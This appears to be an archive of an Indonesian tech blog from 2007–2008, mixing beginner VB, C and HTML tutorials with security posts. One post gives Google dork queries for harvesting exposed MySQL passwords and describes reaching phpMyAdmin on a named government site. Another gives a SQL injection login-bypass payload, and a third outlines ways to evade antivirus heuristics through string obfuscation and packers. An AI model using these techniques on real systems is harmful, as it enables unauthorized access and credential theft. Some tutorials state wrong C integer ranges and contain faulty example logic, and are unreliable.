Sering kali kita ingin sekali membaca seluruh artikel dalam suatu situs internet tapi sayang yah kita harus mencari komputer yang selalu konek dengan internet. Banyak orang yang bertanya kepada saya dapatkan situs saya dapat dibaca tanpa menggunakan internet? Awalnya saya ragu apakah bisa. Sabtu kemarin saya bertanya kepada seorang dosen apakah bisa kita mambaca situs internet tanpa harus terkoneksi dengan internet.Hasilnya Dosen itu memberikan saya sebuah program kecil.Dosen itu berkata saya hanya memberikan program saja, cara pakai yah kamu cari tahu sendiri.Hal itu sering dilakukannya karena ia tidak ingin namanya tercermar apalagi ia mengajar disalah satu kampus dimana mantan dua artis cilik kuliah.Program tersebut bernama teleport.Saya mencoba menginstall yah den mencoba apakah teleport dapat manjawab kebutuhan saya.Teleport ternyata dapat menjawab kebutuhan saya.

Seperti gambar diatas kita tinggal menekan new dan masukankan nama situs yang hedak ditarik, o ya bagi yang komputernya diproteksi oleh proxy harus melakukan seting proxy server yang ada di file lalu cari proxy server, alhasil kalau semua sudah kelar hasilnya akan seperti ini.

Lalu apa hubunganya dengan topik sekuriti bayangkan jika yang ditarik adalah situs yang dipakai oleh public dan satu kata saja yang diganti maka tulisan ini sangat relevan bukan. Semoga saja tulisan ini membuka wawasan anda

VB

2008-01-14T16:17:00.001-08:00

Dibuat oleh : Z
Kemarin kita sudah membahas if bersarang atau yang lebih populer if dalam if hari ini kita akan membahasa select case. Select case adalah salah satu bentuk pilihan yang cukup unik, daripada bingung mending buruan deh bikin form seperti dibawah ini

kalau sudah coba klik di form yah lalu isi deh coding sebagai berikut
Private Sub Form_Load()
Randomize 'Acak angka
a = Int(Rnd * 10) 'Isi a dengan angka yang telah diacak maxnya angka 10
End Sub
terus klik deh command butonnya isi dengan koding seperti dibawah ini
Private Sub Command1_Click()
Select Case a
Case 1
MsgBox "Nilai = 1"
Case 2
MsgBox "Nilai = 2"
Case 3
MsgBox "Nilai = 3"
Case 4
MsgBox "Nilai = 4"
Case 5
MsgBox "Nilai = 5"
Case 6
MsgBox "Nilai = 6"
Case 7
MsgBox "Nilai = 7"
Case 8
MsgBox "Nilai = 8"
Case 9
MsgBox "Nilai = 9"
Case 10
MsgBox "Nilai = 10"
End Select
End Sub
minggu depan kita akan melanjutkan dengan hal yang baru. O ya saya dapat masukan dari pemilik blog ini agar tidak terlalu lama mengulang logika perograman. Menurut beliau pembahasan logika membuat kita sangat lambat mencapai tujuan yaitu membuat sesuatu yang bisa dipakai didunia kerja.Maka saya putuskan tidak akan mengajarkan lagi hal-hal yang berbau dengan logika seperti if,for dan lain-lain yang berhubungan dengan logika.Maka minggu depan kita langsung meloncat kepada database sesuai dengan rekomendasi pemilik blog ini.Bagi temen-temen yang ingin melatih logika pemrogramnnya dengan vb dapat membeli buku step by step visual basic 6. Buku ini sudah diterjemahkan kedalam bahasa indonesia tanpa mengurangi isinya.Jadi Selamat Datang Dunia Database Visual Basic 6

Windows Vista Ultimate Gratis dari Microsoft !

2008-01-10T23:44:00.000-08:00

Windows Vista Ultimate Gratis dari Microsoft !
Oleh JS

Microsoft memberikan versi Windows Vista yang paling mahal secara gratis ? Apakah itu sebuah mimpi ? Tidak ! Melalui program yang dinamakan "Windows Feedback Program", Anda bisa mendapatkan Windows Vista Ultimate secara gratis dan menggunakannya secara sah.

Software gratis yang disediakan ini bukan hanya versi Vista Ultimate namun juga terdapat software yang lainnya yaitu :

Microsoft Windows Vista Ultimate (32-bit and 64-bit DVD)
Microsoft Office Ultimate 2007
Microsoft Money Plus Premium
Microsoft Student with Encarta Premium 2008
Microsoft Streets and Trips 2008

Tentu saja, ada imbalan yang diminta oleh Microsoft yaitu privacy Anda ! Microsoft akan memantau apa yang Anda kerjakan pada komputer Anda selama 3 bulan ! Sayang sekali, program ini hanya diberikan kepada penduduk US dan tidak ada program semacam ini untuk Microsoft Indonesia (atau belum?)

Anda bisa melihat informasi selengkapnya di :

http://wfp.microsoft.com/

Membuka kembali video gratis dari youtube

2008-01-10T16:15:00.000-08:00

Membuka kembali video gratis dari youtube
Oleh starnet
Disini saya akan meneruskan file yg ada di http://www.jasakom.com/article.aspx?ID=872
yaitu mengenai download video gratis dari youtube.com saat ini sepertinya sudah di patch sama admin nya atau mungkin saya yang kurang beruntung

berikut adalah cara saya :

buka browsermu dan masuk ke youtube.com
cari video kesukaanmu :P
selanjutnya cari, view page info-nya

cara saya adalah:

klik kanan di dekat tombol play video
dan cari view page info
setelah itu cari video_id= bla...bla...bla...
tetapi kebanyakan format nya gambar (.gif ; .jpg atau ; .png)
dan disayangkan file .flv nya udah gak ada xixixixi
mari kita coba source nya
cari file .swf ; .flv atau video_id nya langsung

contoh :
video_id:'AlHoLOfpKwg',l:'173',t:'OEgsToPDskLPRynbiMUpUWxgj0LAgTgW',sk:'hJIWUEDUyAaqUHgH-nP3tAU'};

saya mengeditnya terlebih dahulu di notepad agar tampak lebih mudah :P

=============================== start ========================================

video_id:'AlHoLOfpKwg',l:'173',t:'OEgsToPDskLPRynbiMUpUWxgj0LAgTgW',sk:'hJIWUEDUyAaqUHgH-nP3tAU'};

:' ganti dengan =
', ganti dengan = &

video_id=AlHoLOfpKwg&l=173&t=OEgsToPDskLPRynbiMUpUWxgj0LAgTgW&sk=hJIWUEDUyAaqUHgH-nP3tAU

ketemu !

http://youtube.com/get_video?video_id=AlHoLOfpKwg&l=173&t=OEgsToPDskLPRynbiMUpUWxgj0LAgTgW&sk=hJIWUEDUyAaqUHgH-nP3tAU

=============================== akhir ========================================

sekarang tinggal download deh :P

Lesson 3

2008-01-10T16:04:00.001-08:00

Lesson 3
Variabel dan Tipe data

di lesson ke-2 gwa ada nyinggung-nyinggung soal vaiabel and tipe data.
Nah di lesson ke-3 ini kita bakal ngebahas sedikit lebih jauh mengenai variabel
dan tipe data.

Variabel itu sendiri adalah tempat untuk menyimpan data, ah berhubung jenis data itu
berbeda-beda jenisnya, maka suatu variabel harus ditentukan untuk tipe data apa dia
dipergunakan.

Tipe data sendiri terbagi menjadi 2 bagian besar
1. Tipe data sederhana (seperti Integer, Float, Pointer, dll)
2. Tipe data bentukan (Array, Struct, Union)

Nah untuk lesson ini kita membahas dulu tipe data sederhana Integer.

Integer merupakan tipe data yang digunakan untuk menyimpan data berupa bilangan bulat
contohnya : angka 1, 2, 25, 250, dan sebagainya

Di Bahasa C sendiri, dikenal beberapa jenis turunan tipe data integer yang dibedakan
dari daya tampungnya.

1. char
Tipe data ini memiliki ukuran 8 bit. Char memiliki daya tamung sebesar 256 dengan range
nilai dari -128 sampai 127. Kegunaan char untuk menyimpan karakter huruf atau tanda baca.

2. short
Tipe data ini memiliki ukuran 16 bit. short memiliki daya tampung sebesar 65.536 dengan range
nilai -32.768 sampai 32767.

3. int
Tipe data ini memiliki ukuran 32 bit. int memiliki daya tampung sebesar 4.294.967.296 dengan range
nilai -2.147.483.648 sampai 2.147.483.547.

4. long
Tipe data ini memiliki ukuran 32 bit. int memiliki daya tampung sebesar 8.294.967.296 dengan range
nilai -4.147.483.648 sampai 4.147.483.547.

=================================================================================================
Di lesson ke-4 nanti kita bakal tetap membahas mengenai tipe-tipe data kayaknya sih gwa bakal ngejelasin]
dulu mengenai float dan pointer. Baru ntar kita maju ke pembahasan mengenai tipe data bentukan.

Yang penting itu kita mengerti dulu mengenai dasar-dasarnya jadi untuk kedepannya kita tinggal
mengembangkannya aja

Audio Portable

2008-01-08T16:50:00.000-08:00

Audio Portable
Dibuat oleh vbbego
Disadur dari XXX Windows 2
Jack dan sky pergi ke warnet yang berada dekat sebuah kampus yang cukup populer di jakarta, disana banyak mahasiswa yang pinter dan jago itupun mereka tau dari seorang wanita penjaga warnet yang katanya masih kuliah semester tiga dan banyak mendapatkan pertolongan dari anak kampus itu sesudah memesan dua buah komputer, sky mulai bingung dengan aplikasi yang ada di drive d komputer tersebut disediakan sebuah folder yang isi lagu-lagu terbaru seperti gigi,slank dan t2 yang menjadi masalah dalam komputer itu tidak ada program winamp.Sky mulai bingung ketika ingin menyortir lagu yang ingin diambil karena ia tidak dapat mendengarkannya terlebih dahulu. Anehnya diwarnet ini menyediakan alat untuk mendengarkan lagu. Sky mulai melihat kepada Jack yang sedang main internet dengan kepala yang terus berputar-putar. Sky bertanya apakah Jack sedang main internet sambil mendengarkan lagu maka dijawab oleh jack yup.Ko bisa sih, apa sih yang menjadi rahasia yah ? Jack mempunyai portabel Audio.Kata Jack kepada Sky Jika kamu mempunyai program portable audio player portable, maka kamu tidak perlu merasa jengkel apabila kamu sedang menggunakan komputer umum yang tidak ada program audio player yah, karena kamu tinggal mencolok usb stick saja. Kamu dapat menikmati lagu dan musik yang audio playernya dieksekusi dari flashdisk kamu.Dunia portable sangat membantu kita dalam menjalankan hidup semakin hidup, tapi sayang yah dunia ini tidak lebih terkenal.Orang lebih suka program yang nempel pada komputer daripada yang tidak. Jack adalah temen yang saya julukkan Portabel Man.Isi komputer Jack sangat banyak program portabel yah diantara yah NOD 32 Portable,jet audio portabel , mozzila portabel,winrar portabel dan yang terakhir open office portabel.Program portabel yang lain akan kita bahas dalam minggu-minggu yang akan datang

Tag HTML II

2008-01-08T16:15:00.000-08:00

Dibuat oleh Ani
Kita akan menyambung apa yang dimaksud dengan tag dasar kalau kemarin kita telah belajar sampai paragraf sekarang kita akan mempelajari Line Break,Heading,komentar. Hari ini kita akan lebih banyak menggunakan contoh-contoh yang akan membuat anda terbiasa dengan html.

Line Break didalam html kita dapat memaksakan ganti baris, untuk memaksakan ganti baris dalam HTML menggunakan tag yang namanya adalah tag
, bingung daripada jadi sapi ompong, cobalah coding dibawah ini

kalau tidak ada yang salah dalam penulisan, hasilnya adalah setiap ketemu dengan tag br maka tulisan akan ada dibawahnya lagi
Heading didalam HTML berguna untuk membuat sebuah text lebih besar, bingung lagi cobain aza coding dibawah ini dan lihat hasilnya

weleh-weleh gampang bukan yah hasilnya tulisan pertama besar terus kebawah yah makin kecil dan terus makin kecil. Komentar adalah suatu perintah yang tidak akan ditampilkan dengan mengunakan tag
ok sampai disini dulu yah karena saya harus masuk ke kelas nih, sampai ketemu minggu depan yah

Memanen Password MySQL

2008-01-08T16:04:00.000-08:00

Memanen Password MySQL
Oleh tomplixsee
Walaupun ide dasar teknik ini saya temukan dari sebuah forum, namun ada baiknya digunakan untuk menambah pengetahuan bersama (maaf bagi kakak2 yg sudah ahli karena tulisan ini ditujukan untuk temen2 yg belum tahu). Kecerobohan seorang webmaster dalam membuat file konfigurasi password sql bisa berakibat fatal. Misalnya saja jika konfigurasi password tersebut disimpan dalam ektensi inc, yg mana biasanya file yg disimpan dalam ektensi tersebut akan bisa langsung dibaca isinya oleh client, tidak seperti jika disimpan dalam ektensi php misalnya.

Mendapatkan password mysql tersebut akan sangat mudah dilakukan dengan bantuan google, misalkan dengan sintax filetype:inc intext:"mysql_connect" site:id ataupun inurl:"password.inc" intext:"password" .

Saya coba memasukkan syntax filetype:inc intext:”mysql_connect” site:id (mencari file berektensi inc yg didalamnya ada kata mysql_connect dan berada di dalam server indonesia, jika syntax site:id dihilangkan maka akan terdapat banyak sekali hasil yg didapat). Terdapat beberapa hasil, kemudian saya coba www.bkpm.go.id.

Saya coba mengakses server tersebut melalui mysql client dari komputer saya, dan ternyata koneksi ditolak. Saya pikir mungkin saya tidak bisa mengakses karena mungkin difilter oleh firewall ataupun memang server tersebut tidak mengijinkan alamat luar untuk mengaksesnya. Kemudian saya coba-coba untuk mengakses server tersebut lewat phpMyAdmin (ternyata phpMyAdmin masih terpasang/digunakan dan membolehkan koneksi dari luar), yaitu http://www.bkpm.go.id/phpmyadmin/ dan ternyata bisa (karena akan dianggap sebagai koneksi dari web servernya sendiri).

Sedangkan contoh server yg membolehkan akses melalui mysql client dari alamat luar adalah 203.149.10.200.

Dari hal2 diatas mungkin bisa sedikit menambah pengetahuan bagi administrator agar lebih berhati-hati dalam mengamankan mysql servernya.

Atas hal2 yg kurang jelas & kurang berkenan serta segala kesalahan saya meminta maaf, saya masih sangat bodoh dan harus belajar lebih giat untuk bisa mengikuti jejak kakak2 semua.

If Lanjutan

2008-01-07T16:06:00.000-08:00

Visual Basic
dibuat oleh Z
Kalau kita kemarin sudah berhasil membuat if, maka hari ini kita akan belajar bagaimana kalau ternyata didalam pemilihan if ada pemilihan lagi atau yang biasa disebut if dalam if. Bingung khan cobalah kamu rancang program seperti gambar dibawah ini

setealh itu cobalah klik command butom dan isilah sehingga menjadi seperti ini
Private Sub Command1_Click()
If Me.Text1 <= 17 Then
MsgBox ("Belom Boleh Nonton")
Else
If Me.Text1 >= 17 Then
MsgBox ("Belom Boleh Nonton")
End If
End If
End Sub
Tidak terlalu susah khan, yah begitulah minggu depan kita akan membahas select case atau yang biasa disebut pilihan yang banyak

Sabtu punya nih

2008-01-04T16:27:00.008-08:00

Apa dan Bagaimana : Teknik Heuristik Pada Antivirus
Oleh Fajar
Published: Januari 2, 2008
Print

Teknik heuristik merupakan teknik yang dipakai antivirus untuk mendeteksi keberadaan virus2 baru atau yang belum terdapat di signature antivirus tersebut. Bagaimana caranya? Tentunya setiap antivirus memiliki cara sendiri2. Kita ambil contoh antivirus (yang lokal2 aja ya..) Ansav +E Advanced 1.7.8 (ga tau klo ada versi barunya) , av ini mengusung "Advanced Ansav Heuristic Engine". Pada AAHE ini, Ansav akan mendeteksi suatu file sebagai ancaman dengan dengan membandingkan suatu signature dengan entrypoint/PE Header pada body file. Yah kurang lebih begitu. Sedangkan pada PCMAV rc23, heuristik andalannya yaitu dengan mengecek jika suatu file mempunyai signature suatu icon tertentu. Maksudnya jika kita membuat program yang mengandung icon folder (baik sebagai icon file atau resource) maka PCMAV akan menganggap file tersebut sebagai ancaman.

Namun teknik-teknik heuristik tersebut dapat dilewati/ heuristic bypassing dengan mudah, misalnya pada Ansav, kita dapat memakai program packer2 yang tidak terdapat di "database" heuristiknya Ansav. Sedangkan pada PCMAV, ya.. paling gampang tinggal ga pake icon2 yang dianggap ancaman (icon folder, word dsb) atau mengubah struktur body icon memakai program hex editor (namun hati2 biar icon ga berubah gambar)

Pada kesempatan ini saya akan membahas teknik heuristik untuk mendeteksi worm VBS. Ini karena penasaran sama PCMAV yang selau aja jitu menebak VBS worm. Ceritanya ketika teman saya minta bersihiin virus, truz ternyata terdeteksi sebagai worm oleh antivirus luar di pc saya, iseng pengen nyoba kehebatan antivirus saya tersebut, saya mencoba mengenkripsi worm tersebut, dimana tulisan "Scripting.FileSystemObject" saya enkripsi menjadi Chr(83) + Chr(99) + Chr(114) + Chr(105) + Chr(112) + Chr(116) + Chr(105) + Chr(110) + Chr(103) + Chr(46) + Chr(70) + Chr(105) + Chr(108) + Chr(101) + Chr(83) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(79) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + Chr(116)

Tadaaa... ternyata antivirus saya tidak mampu mendeteksinya... Kemudian teringat PCMAV (soalnya pernah baca diweb resminya klo PCMAV punya heuristik canggih buat mendeteksi file VBS). Pas discan pake PCMAV ternyata terdeteksi. Ya udah saya enkripsi semua string. Ehhh ternyata masih terdeteksi... hebat2... ini antivirus punya paranoid heuristik Setelah saya teliti2 hampir seribu detik, ternyata heuristiknya PCMAV yaitu dengan mendeteksi beberapa tulisan yang tidak mungkin tidak dipakai oleh suatu worm, yaitu salah satunya kombinasi command "CreateObject" dan "wscript.scriptfullname". Tulisan ini gimana ya enkripsinya?? soalnya tipe tulisan ini bukanlah string, melainkan command internal pada VBS. Klo di Delphi command2 mungkin bisa dienkripsi,itu mungkin juga cuma command2 yang memakai API misalnya "UrlDownloadToFile" dimana memanggil dari file urlmon.dll. Yah main2in memory (GetProcAddress).

Tapi, saya ga akan membahas bagaimana caranya heuristic bypassing, malez bo klo banyak virus canggih, ntar klo ada cewek minta tolong saya bersiin pcnya dan saya ga bisa kan.. giiitu dech... Ok.. lanjut, kita kita akan bikin program dasar untuk mendeteksi worm VBS.

Yang kita perlukan adalah VB6 dan :
Komponen dan nama

TextBox : Text1

CommandButton : Command1
CommandButton : Command2
CommonDialog : CommonDialog1

Pada Command1 isikan :

CommonDialog1.Filter = "VBS File (*.vbs)|*.VBS"
CommonDialog1.ShowOpen
If CommonDialog1.FileName = "" Then Exit Sub
Text1.Text = CommonDialog1.FileName

Pada Command 2 isikan :

Vbs_Checker Text1.Text

Kemudian buat fungsi sebagai berikut :

Public Function Vbs_Checker(ByVal target As String)

If target = "" Then Exit Function
If Dir$(target) = "" Then Exit Function

On Error Resume Next

Open target For Input As #1
While EOF(1) = False
DoEvents

Line Input #1, maltext
maltext = " " & maltext
maltext = LCase(maltext)

If InStr(maltext, "createobject") > 0 Then GoSub warning
If InStr(maltext, "regwrite") > 0 Then GoSub warning
If InStr(maltext, "wscript.scriptfullname") > 0 Then GoSub warning
If InStr(maltext, "ActiveDocument.Shapes.AddOLEObject") > 0 Then GoSub warning

Wend

Exit Function

warning:
MsgBox "Suspected command : " & maltext, vbExclamation, "Warning"
Return
End Function

Seharusnya kode2 di atas self explained, tapi saya jelasin lagi deh buat pemula kaya saya. Inti dari program tersebut yaitu membaca file VBS yang kita pilih dan membandingkan isi file VBS dengan tulisan tertentu, misalnya "createobject". Jika ketemu tulisan tersebut maka keluar peringatan.

Sekali-lagi, kode2 di atas hanyalah konsep untuk mendeteksi worm VBS. Mungkin lebih baik dengan membandingkan lebih dari satu kata untuk mencegah indikasi false alarm.

Demikianlah (kaya nutup pidato aja), mudah2an ada manfaatnya buat yang baca.
Trims.

Lesson 2

2008-01-04T16:21:00.000-08:00

Lesson 2
Perintah-perintah dasar

hehehe... kita masuk ke lesson yang ke-2, perintah2 sederhana yang terdapat pada Cl.

Perintah-perintah dasar pada C

Perintah-perintah yang terdapat pada C sangat banyak (gwa kagak tau persis berapa banyak, pokoknya banyaaak ). Naah.. di lesson ini kita pelajari yang dasar-dasar aja, yang biasanya dipake ama orang-orang. Gwa langsung mulai aja yach

1. printf
Baca penjelasan saya di lesson pertama

2. Scanf
Kebalikan dari printf, scanf merupakan perintah input yang ditujukan pada user yang menggunakan program kita.

contoh :

CODE
scanf("%d",&a);

nah.. pasti pada bingung ama tulisan diatas, maksud tulisan diatas ialah menerima masukan angka bertipe integer (%d merupakan tipe masukan ataupun keluaran untuk integer) yang dimasukkan pada variabel a (tanda & di depan huruf a memiliki arti input pada a).

Wah..wah.. pasti pada tambah bingung lagi ama yang namanya tipe kan ?? ok...ok sabar ntar itu gwa jelasin pada bagian variabel. Sekarang ini gwa jelasin dulu perintah-perintah standar pada bahasa C otre ;)

3. Pengandaian (IF)
Perintah IF merupakan perintah pengandaian, berguna untuk mengerjakan suatu aksi yang memiliki syarat-syarat tertentu.
Contoh :

CODE

IF(a>5)
{ printf("Bilangan lebih besar dari lima\n");
}
else
{ printf("Bilangan lebih kecil dari lima\n");
}
Maksud dari kode diatas adalah, apabila angka pada variabel a lebih besar dari 5, maka di layar monitor akan tertulis Bilangan lebih besar dari lima, tetapi apabila angka pada variabel a lebih kecil dari 5 maka tertulis Bilangan lebih kecil dari lima.
Untuk perintah pengandaian lebih lanjut bakal gwa bahas di lesson khusus.

4. Pengulangan (loop)
perintah-perintah pada pengulangan (for, while, atau do-while) berguna untuk suatu aksi yang membutuhkan suatu kondisi yang berulang-ulang. contoh :

CODE

for(a=1;a<=10;a++)
{ printf("viva HPS mania\n");
}

Maksud perintah for diatas adalah :
a merupakan 1, selama si masih lebih kecil atau sama dengan 10, program akan menuliskan kata-kata viva HPS mania. Diakhir satu aksi, a bertambah sebanyak 1. Untuk perintah pengulangan berikutnya akan saya bahas lebih lanjut.

note : all.. gwa dah ngantuk, artikelnya gwa lanjutin besok deh. Skarang mo bo2 dulu neeh

tha2....

Antivirus Portabel

2008-01-03T16:18:00.000-08:00

Antivirus Portabel
Oleh : Vbbego
Disadur dari : XXX Windows Xp 2

Suatu hari Jack main ke rumah Sky. Seperti biasa Jack ingin mengambil data dari komputer Sky. Sky bertanya kepada Jack apakah flash disk aman. Jack bilang dia sih yakin karena di flash disknya ada antivirus yang sering dia update. Sky bertanya lagi emang bisa yah antivirus ditaruh di flash disk. Hari gini belom tahu kalau flash disk bisa ditaruh antivirus kata Jack.Saya rasa bukan saja Sky yang tidak tahu, masih banyak orang yang mungkin belom tahu. Lalu bagaimana caranya tanya Sky kepada Jack, Saya sih dapat dari buku, tapi update an yang saya cari dari internet. Memang apa yang dikatakan Jack bukan bohong. Waktu saya membaca buku yang saya ambil sebagai bahan saya juga kaget ternyata banyak juga aplikasi portabel yang dapat digunakan. Fokus kita pada saat ini adalah antivirus. Ada beberapa program antivirus yang dapat anda gunakan seperti antivir portable, mcAfee portable bahkan sampai nod 32 yang menurut kantor saya antivirus yang ringan dan cukup sakti. Apa yang menjadi keuntungan apabila kita memakai antivirus yang portabel. Menurut saya yang menjadi keuntungannya yah jelas saja ukuran filenya yang sangat kecil dan tidak perlunya melakukan proses penginstall jika ingin dipindahkan cukup anda mengcopy saja. Hasil penelitian saya antivirus portabel sangat ringan beberapa antivirus yang diberikan dalam cd dari buku yang saya baca itu sekitar 17 Mb, sangat kecil bukan masalah kinerjanya tidak berbeda dengan yang bukan portabel.O ya ini bisa menjadi bahan pertimbangan teman-teman yang ingin komputernya bersih tetapi tidak ingin komputernya jadi lambat. Melanjutkan cerita diatas Sky bertanya kembali kepada Jack apakah yang portabel bisa juga digunakan di PC untuk memperingan kinerja PCnya. Jack menjawab kalo itu sih udah pasti gue sih udah pake hampir semua yang ada dibuku itu, Jauh beda men sebelom gue pake portabel. OS engga berat, dan lagi mudah banget waktu mau dipindahin, waktu komputer baru install ulang gue bersyukur banget mana waktu itu cd bajakan gue dipinjem temen kalo diminta galakan dia lagi, untung ada portabel aplikasi gue jadi engga bingung lagi, lagian menurut gue aplikasi portabel engga kalah ko, lagian dengan menggunakan aplikasi dapat megurangi pembajakan diindonesia soalnya aplikasi portabel bisa didownload dari internet jadi gratis gitu loh. Dari cerita diatas semoga saja banyak orang yang menggunakan aplikasi portable.Hidup dunia portable yang powerful and ringan

Tag Dasar HTML I

2008-01-02T16:02:00.000-08:00

Tag Dasar HTML I
Oleh:Ani

Hari ini kita kan membedah semua yang kita pernah buat minggu lalu dan sekaligus menambah pengetahuan yang baru.Apa saja yang termasuk dalam tag dasar html ? Karena terlalu banyak kita akan membelahnya menjadi dua bagian, hari ini kita akan membahas sampai paragraf sisanya akan dibahas minggu depan
1.HTML
Tag ini berguna untuk mendrfinisikan bahwa dokumen ini adalah dokumen HTML
2.Head
Tag ini berguna untuk menuliskan keterangan tentang dokumen web yang akan ditampilkan
3.Title
Tag ini berguna untuk memberikan judul / informasi pada caption browser web tentang
topik atau judul dari web
4.Body
Tag ini merupakan section utama dalam web
5.Paragraf
Tag ini mengatur paragraf dalam suatu web
Ok, saya tahu kalau diteruskan teori saja mungkin banyak dari pembaca akan sangat bosan oleh karena itu supaya pembaca tidak bosan silakan and mencoba coding dibawah ini.

Terlihat perbedanannya khan yang tidak memakai paragraf dan yang memakai paragraf

Teknik Login sebagai siapa saja

2008-01-01T17:39:00.000-08:00

Teknik Login sebagai siapa saja
Oleh: Vbbego
Disadur dari : Seni Internet hacking

Kalau minggu lalu kita telah belajar bagaimana mendapatkan password, maka minggu ini kita akan membahas bagaimana kita bahkan bisa login sebagai user manapun tanpa perlu mengetahui password aslinya. Contohnya kalau kemarin kita mendapatkan password yang paling atas, ternyata password tersebut bukanlah user dengan nama administrator maka akan sia-sia bukan, oleh karena itulah kita akan belajar bagaimana mendapatkan password seperti kehendak kita.Contoh apabila dalam databases tersebut adalah seorang yang kita tahu bernama John,maka saya bisa login sebagai John tanpa perlu mengetahuinya. Cara yang digunakan cukup sederhana, pada text box memasukkan “User name” isilah dengan “John” sedangkan pada text box password boleh diisi dengan apa saja atau dengan 'or”=”.Jadi perintah tersebut akan menjadikan statement Sql sebagai berikut : Select * from tbl_user where field_username = 'John' and field_password=' ' or ' '='. Karena kondisi pembanding yang hanya dilakukan pada field username sedangkan pada field password sudah tidak dibandingkan maka anda otomatis bisa login tanpa perlu mengetahui passwordnya. Menarik bukan ? Teknik ini akan semakin berkembang tergantung dari kreasi anda. Mungkin suatu hari anda mungkin bisa membuat , mengahapus, serta merubah isi database orang. Kalau saya berhenti disini pasti banyak orang yang tidak akan mengunjungi Blog saya lagi. Saya akan memberi tahu bagaimana mencegah Sql Injection. Menurut saya pribadi hal yang paling gampang adalah waktu pembuatan program dibatasi penggunaan username dan password tidak boleh menerima special karakter seperti (*,=,-,',”) dan buatlah batasan yang lebih kejam contohnya username dan password hanya bisa menggunakan a sampai z,A sampai Z dan 0 sampai 9, Jadi selain karakter tersebut maka username dan password ditolak.Sayangnya segala yang saya tulis disini menjadi tidak berguna ketika anda mencoba mempraktekkannya dikampus bagi yang masih kuliah dan ditempat kerja bagi yang telah bekerja, Alasannya yang sering saya dengar adalah buat apa nambah-nambahin koding aza, capek tahu mikir sampai kaya gitu emang gaji kita berapa? Sayang bukan saya berharap semua pembaca dapat membantu memberitahukan hal ini kepada programernya masing-masing (Bagi yang sudah kerja), Bagi yang belom biasakanlah membuat program yang bagus.

VB II

2008-01-01T17:03:00.000-08:00

Visual Basic II
Dibuat oleh :Z

Sorry temen-temen karena saya minggu lalu tidak menulis, O ya selamat Tahun Baru yah semoga aza ditahun yang baru kita semua bertambah maju. Hari ini saya akan menjelaskan tentang if.... then....else...Kalau dapat diterjemahkan kedalam bahasa indonesia mungkin yang paling tepat adalah jika dan hanya jika.Untuk mudahnya teman-teman dapat mencoba membuat program seperti dibawah ini deh.

Kemudian klik dua kali form yah dan isikan dengan coding seperti ini
Private Sub Form_Load()
Text3.Text = 0 'coding ini membuat text3 menjadi 0
Text2.Text = 0 'coding ini membuat text2 menjadi 0
Text1.Text = 0 'coding ini membuat text1 menjadi 0
End Sub
Kemudian klik dua kali gambar jam yah diisi dengan coding seperti ini
Private Sub Timer1_Timer()
Text3.Text = Text3 + 1 ' coding ini membuat text3 bertambah satu
If Text3.Text = 60 Then ' Coding ini jika text3 = 60 lakukan
Text3.Text = 0 ' Text3 = 0
Text2.Text = Text2.Text + 1 ' coding ini membuat text2 bertambah satu
Else ' coding ini kalau tidak
Text3.Text = Text3.Text' Coding ini maka text3 yah text3
End If
If Text2.Text = 60 Then ' Coding ini jika text2 = 60 lakukan
Text2.Text = 0 ' Text2 = 0
Text1.Text = Text1.Text + 1 ' coding ini membuat text3 bertambah satu
Else ' coding ini kalau tidak
Text3.Text = Text3.Text' Coding ini maka text2 yah text2
End If
End Sub
Kemudian klik dua kali command button diisi dengan coding seperti ini
Nah kalau kita melihat diatas kita jadi dapat mengetahui fungsi if bukan. Yup fungsi if memang digunakan untuk pembuat pemilihan. Jika kondisi yang kita buat benar lakukan perintah dibawahnya, jika salah lakukan perintah yang salah. Mudah bukan samapai jumpa minggu depan yah, o ya minggu depan kita akan membahas if didalam if

Drive by Download

2007-12-21T17:14:00.000-08:00

Drive by Download 3 Desember 2007
Hati-hati ancaman virus kartu ucapan akhir tahun melalui drive by download !!

(Artikel Chip 11 – 2007 (November))

Benteng Maginot adalah suatu sistem pertahanan Perancis pada tahun 1940-an yang tersebar di sepanjang perbatasannya dengan Jerman dan Italia. Benteng ini memiliki kemampuan pertahanan yang sangat kuat dan dibangun berdasarkan pengalaman perang defensif Perang Dunia I. Tetapi sejarah membuktikan bahwa pada Perang Dunia II, pasukan Jerman tidak bodoh dengan menyerang Perancis melalui perbatasannya sehingga harus menghadapi benteng Maginot ini, tetapi malahan menyerang Perancis melalui Belgia dan Belanda menembus hutan Ardennes dan sampai di Utara Perancis dan akhirnya seperti kita ketahui Jerman berhasil menaklukkan Perancis.

Hal yang mirip terjadi pada pertempuran di dunia IT hari ini. Para administrator mailserver yang pada mulanya memperbolehkan lampiran apapun melewati server dan tiba di mail client pengguna email. Tetapi karena pembuat virus memanfaatkan lampiran email sebagai sarana untuk menyebarkan dirinya dan beberapa bahkan melakukan rekayasa sosial dengan memalsukan diri sebagai lampiran yang tidak berbahaya seperti .txt atau .jpg maka akhirnya para administrator mailserver juga melakukan blok pada lampiran-lampiran berbahaya dan hanya membolehkan beberapa lampiran lewat seperti .zip dan .rar. Tetapi menilik perkembangan terakhir dimana pembuat virus juga mulai menggunakan lampiran .zip dan .rar, bahkan perkembangan terakhir yang cukup mengejutkan dimana lampiran yang tidak berbahaya seperti .pdf pun menjadi lampiran yang berbahaya karena virus memanfaatkan celah keamanan pada Adobe Acrobat yang terbaru sehingga dapat menembus pertahanan OS dan melumpuhkan firewall Microsoft maka banyak administrator mengambil jalan pintas. BLOK semua lampiran. Walaupun secara tidak langsung hal ini menurunkan derajat dimana menerima email mirip dengan menerima SMS, tetapi hal ini dipercaya dapat memberikan keamanan bagi pengguna akhir yang memang menjadi incaran para pembuat virus guna menyebarkan dirinya. Apakah hal ini berhasil mengamankan penerima email 100 % dari serangan virus ? Ibarat Benteng Maginot, para pembuat virus pada mulanya tidak berdaya menghadapi bloking ini, tetapi ibarat tentara Jerman yang tidak bodoh untuk berhadapan langsung, para pembuat virus jugatidak kalah cerdik dan akhir-akhir ini berhasil menemukan cara untuk mengatasi pengamanan no attachment yang diterapkan oleh administrator mailserver yang radikal ini. Bagaimana caranya ? Jawabannya adalah “Drive by Download”.

